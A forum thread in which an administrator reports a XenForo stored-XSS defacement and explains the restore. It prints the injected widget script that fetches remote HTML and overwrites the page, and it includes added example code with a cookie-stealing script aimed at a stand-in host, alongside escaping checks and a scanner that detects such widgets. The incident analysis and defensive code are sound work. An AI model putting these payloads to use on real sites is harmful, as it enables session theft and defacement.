Whoops - a Xenforo XSS vulnerability bit us!

Rob

Administrator
Staff member
I had upgrading xenforo on my todo list, and didn't get to it in time. Someone was able to use a new XSS vulnerability to inject code into a site widget. After many mysql queries, we found it happened at about 14:06 ET. Also, I did not see any exports or any ability to do exports.

I played it safe and:
  • shut down nginx
  • ran any available server software upgrades while things were down
  • restored from last night's (12am ET) backup (site files and db)
  • ran any available xenforo upgrades
Kind of a pain, since that backup was from 16hrs ago. I'll prob make them every 6 or 12hrs from now on.

Sorry about that folks. It looks like some other big xenforo sites got bit as well!

IMPORTANT: If you created your account on here after 12am ET last night, you'll have to do that again. Obv anything posted since then is gone as well.

Special thanks go out to @KGIII and @f33dm3bits who were troubleshooting with me for the past cpl hours!

Rob

Edit: Xenforo info on the patch/fix:

Edit2: more info: https://github.com/methosiea/xenforo-2-xss
So, the attack chain is basically:
  1. Attacker registers an account
  2. New post w/ the xss payload - it goes to the queue
  3. An admin views it, it fires off the xss payload stealing his session
  4. Attacker creates the malicious widget
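The chain above, worked as an added example (my code, not XenForo's, not the linked advisory's, and not Rob's): a toy moderation-queue renderer that shows the stored-XSS pattern of step 2 and 3, the escape-on-output fix that keeps the payload inert, and a check of the session-cookie flags that blunt step 3. The sample post, the `attacker.example` host and the cookie name are constructed for the example and are not the values from the incident.

```python
import html
import re

# Constructed sample post of the kind step 2 describes; it is not the payload
# from the incident (the page does not reproduce it). It tries to read the
# session cookie of whoever renders it, i.e. the admin viewing the queue.
SAMPLE_POST = (
    'Which distro for an old laptop? '
    '<script>fetch("https://attacker.example/c?" + document.cookie)</script>'
)

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_post_unsafe(body: str) -> str:
    """Vulnerable pattern: raw user text is concatenated into the page, so a
    '<script>' in the post becomes a real script when an admin views the queue."""
    return f'<div class="message-body">{body}</div>'


def render_post_safe(body: str) -> str:
    """Hardened pattern: escape on output. '<', '>', '&' and quotes become
    entities, so the browser shows the payload as text instead of running it."""
    return f'<div class="message-body">{html.escape(body, quote=True)}</div>'


def has_live_script(rendered: str) -> bool:
    """Cheap check a template test can run: does the rendered HTML still
    contain a real script tag (an escaped one no longer matches)?"""
    return SCRIPT_TAG.search(rendered) is not None


def session_cookie_hardened(set_cookie: str) -> bool:
    """Does the Set-Cookie header carry HttpOnly, Secure and SameSite?
    HttpOnly stops document.cookie from reading the session id, which blunts
    step 3 of the chain. It does not stop the script from making same-origin
    requests with the cookie attached, so it is a second line, not the fix;
    escaping on output (above) is the fix."""
    attrs = {part.strip().split("=", 1)[0].lower() for part in set_cookie.split(";")[1:]}
    return {"httponly", "secure", "samesite"} <= attrs


if __name__ == "__main__":
    for label, out in (("unsafe", render_post_unsafe(SAMPLE_POST)),
                       ("safe", render_post_safe(SAMPLE_POST))):
        print(f"{label}: live script = {has_live_script(out)}")
    # Cookie name is an assumption for the example, not necessarily XenForo's.
    print("cookie hardened:", session_cookie_hardened(
        "session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax"))
```

The point of `has_live_script` is that it can sit in a template test suite: render every user-supplied field through the real template with a marker payload and fail the build if a script tag survives.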
 


lol.... some of those people will take that as a personal affront and disappear into the ethers !

Can't be helped

crap happens
Hey, Good job with getting them back up!
 
This is the full inserted content that I could find:

Code:
<div data-template-name="public:widget_html" class="block">
    <div class="block-container" data-widget-id="19" data-widget-key="WN_OP_5338" data-widget-definition="html">
        <h3 class="block-minorHeader">wn_op</h3>
        <div class="block-body block-row">
            <script data-template-name="public:_widget_WN_OP_5338">fetch("https://raw.githubusercontent.com/cassbethany10-afk/test123/refs/heads/main/hahaha.html").then(function(r){return r.text()}).then(function(h){document.open();document.write(h);document.close();});</script>
        </div>
    </div>
</div>

<div data-template-name="public:widget_html" class="block">
    <div class="block-container" data-widget-id="19" data-widget-key="WN_OP_5338" data-widget-definition="html">
        <h3 class="block-minorHeader">wn_op</h3>
        <div class="block-body block-row">
            <script data-template-name="public:_widget_WN_OP_5338">fetch("https://raw.githubusercontent.com/cassbethany10-afk/test123/refs/heads/main/hahaha.html").then(function(r){return r.text()}).then(function(h){document.open();document.write(h);document.close();});</script>
        </div>
    </div>
</div>

(I mistakenly didn't include all of that in the email exchanges, but it was still enough.)

Prior to the site going down, you could bypass the injected script with NoScript. By the time I'd deduced that, the whole site was affected. Initially, it was only affected in the approval queue and in one member's profile (as far as I could find).

Sneaky snot-nosed-punks tried to pin the blame on my account. Ah, well...

I suspect the 'hackers' (script-kiddies that still deface websites) will be back to see if we've resolved the issue and closed the exploit. If so, my message to them is, "We were doing that before you were born. We just grew up."
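To triage a dump for the kind of widget shown in the snippet above, an added example (my code, not XenForo's and not the poster's): a small scanner that walks rendered widget HTML, attributes each `<script>` to the enclosing widget id and key, and lists the remote URLs and any `document.write` use, which is the defacement pattern this thread describes. The sample input is constructed and modelled on the posted snippet; the widget id and key are the ones shown in the thread, `attacker.example` stands in for the real host, and the second widget is a benign one the scanner should ignore.

```python
import re
from html.parser import HTMLParser

URL_RE = re.compile(r"https?://[^\s\"'()<>]+")

# Constructed sample modelled on the snippet posted above. The widget id/key are
# the ones shown in the thread; attacker.example stands in for the real host.
SAMPLE_DUMP = """
<div data-template-name="public:widget_html" class="block">
  <div class="block-container" data-widget-id="19" data-widget-key="WN_OP_5338" data-widget-definition="html">
    <h3 class="block-minorHeader">wn_op</h3>
    <div class="block-body block-row">
      <script data-template-name="public:_widget_WN_OP_5338">fetch("https://attacker.example/deface.html").then(function(r){return r.text()}).then(function(h){document.open();document.write(h);document.close();});</script>
    </div>
  </div>
</div>
<div class="block-container" data-widget-id="3" data-widget-key="footer_links" data-widget-definition="html">
  <div class="block-body"><a href="https://www.example.org/">Home</a></div>
</div>
"""


class WidgetScriptScanner(HTMLParser):
    """Attribute every <script> to the innermost widget container around it."""

    def __init__(self):
        super().__init__()
        self.div_depth = 0
        self.widgets = []      # stack of (widget info, div depth it opened at)
        self.current = None    # finding being filled while inside a <script>
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "div":
            self.div_depth += 1
            if "data-widget-key" in a:
                info = {"widget_id": a.get("data-widget-id"),
                        "widget_key": a["data-widget-key"],
                        "definition": a.get("data-widget-definition")}
                self.widgets.append((info, self.div_depth))
        elif tag == "script":
            info = self.widgets[-1][0] if self.widgets else {
                "widget_id": None, "widget_key": None, "definition": None}
            self.current = dict(info, src=a.get("src"), remote_urls=[], document_write=False)

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data, possibly in chunks.
        if self.current is not None:
            self.current["remote_urls"].extend(URL_RE.findall(data))
            if "document.write" in data:
                self.current["document_write"] = True

    def handle_endtag(self, tag):
        if tag == "script" and self.current is not None:
            self.findings.append(self.current)
            self.current = None
        elif tag == "div":
            # Pop the widget whose container closes at this depth.
            if self.widgets and self.widgets[-1][1] == self.div_depth:
                self.widgets.pop()
            self.div_depth -= 1


def scan_widgets(html_text: str) -> list:
    """Return one finding per <script> element, tagged with its widget."""
    scanner = WidgetScriptScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings


def is_suspicious(finding: dict) -> bool:
    """An HTML widget whose script pulls remote content or rewrites the
    document is exactly the pattern from the thread."""
    return finding["definition"] == "html" and bool(
        finding["src"] or finding["remote_urls"] or finding["document_write"])


if __name__ == "__main__":
    for f in scan_widgets(SAMPLE_DUMP):
        flag = "SUSPICIOUS" if is_suspicious(f) else "ok"
        print(flag, f["widget_id"], f["widget_key"], f["remote_urls"], f["document_write"])
```

Run it over a saved copy of the affected pages (or the widget HTML pulled from the database) rather than the live site; the widget id and key it prints are what you need to find the record to delete or restore, and the remote URL is the indicator to block at the proxy and search for in access logs.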
 
post that screenshot, please?
[screenshot attachment: linux.org.hacked.png]
 
ditto here

[screenshot attachment: 2026-03-31_05-16.png]
 

Aug 16, 2025 12:11 PM

The Turkey-based hacker group WarNight Hack Team carried out a “zone” attack targeting 112 different websites. The group announced that the purpose of the attack was to raise awareness for students and animals.
The following names were reported to be behind the operation:
Vixyum
Destroyerr
Mr. Moriarty
Waxy


Details of the Operation
According to a statement by WarNight Hack Team, a total of 112 websites operating in various fields in Turkey were accessed. Messages left on the websites drew attention to students and animals who lost their lives.
Purpose and Message
The group stated that the attack was not carried out for any financial gain or personal interest, but solely to raise social awareness. The statement included the following remarks:
“We seek justice and awareness for students and animals. We targeted 112 websites to ensure this voice is heard. We stand with those who cannot make their voices heard.”
 
The group stated that the attack was not carried out for any financial gain or personal interest, but solely to raise social awareness. The statement included the following remarks:
“We seek justice and awareness for students and animals. We targeted 112 websites to ensure this voice is heard. We stand with those who cannot make their voices heard.”
There's better ways of spreading the word than skiddy hacktivism.
 
Lol, I took a screenshot of the defaced site, and from what I see they promote their username with a Discord account.

They want you to go to the Discord page to pay them to undo the account.

The information for what it was is in my code snippets above.


That's exactly what skids are.

You're not wrong. Back then, we had to make our own tools, find our own exploits, and did it just to learn and to have fun. The folks I hung around with didn't do anything malicious. The most we'd do would be to replace your index.html with our own -- but we'd rename your existing index.html so that you could recover it.

Well, when .htaccess got regular support, we'd have some fun with that.

Again, this was decades ago. The statute of limitations has long passed.

The Turkey-based hacker group WarNight Hack Team carried out a “zone” attack targeting 112 different websites.

Yup. That's who they were.

Also, if you clicked somewhere near the upper left (maybe elsewhere), it'd start playing you some pretty heavy metal song. I didn't take the time to learn more about that. My concern was, at the time, to do what I could do to get things back up and running.

To that end, I had access much longer than others because it was obviously a script injection, so I enabled NoScript. If you set that to the highest level, the script wouldn't activate, and you could continue to browse the site, use the control panel, moderate, and stuff like that.

What do these people think defacing a Linux user forum is gonna do?? Disgusting. Glad we're back, though.

You being new, I checked your IP address. If I were the person who defaced the site, I'd want to hang out and laugh at what people say about it.

That's not an accusation, just an observation.

Many people, especially arsonists, get caught because they return to the scene of the crime.

But, you appear to be a student and posting from school.

Again, not an accusation.

Pretty sure I have the guy's face lol

Sure, they're terrible people, but you should give that back! ;)
 
I was wondering what was up. I tried coming here and was greeted by a strange message. I searched the message and found a couple other forums/website displaying the same thing. Basically the internet equivalent of spray painting graffiti tags on a bunch of bus shelters.
 
I got distracted and completely forgot to mention what I meant to mention...

We all owe @Rob a hearty thanks. He was quick to the ball, made a plan to deal with it, acted on that plan, and it worked.

Also, we might want to institute a policy of updating the forum as soon as we can when a new version is available.
 